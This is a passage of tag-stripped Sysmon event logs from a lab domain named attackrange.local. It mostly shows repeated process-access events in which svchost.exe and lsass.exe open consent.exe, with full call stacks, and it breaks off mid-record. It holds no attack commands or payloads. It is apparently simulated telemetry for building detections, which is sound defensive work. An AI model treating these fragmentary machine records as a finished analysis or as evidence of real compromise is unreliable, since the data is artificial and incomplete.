Firefox\firefox.exe 17141700x80000000000000001049130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:53:06.237{466BC892-53E5-60E8-EE0F-00000000CF01}2816\chrome.2816.381.91652823C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000807695Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:07.056{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFA6BB03B60E3D352B520796585812AB,SHA256=BAF4C3A747A6A9AE81F2EEAFD15FED1093A61B22DF7D5E9B71BE25FB9A9B184B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.786{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.786{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.786{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.786{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.786{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.786{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.786{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.770{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.770{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.770{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.770{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.770{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.770{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.770{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.770{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.754{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.754{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:07.754{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.754{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.754{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.754{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.754{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.754{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPC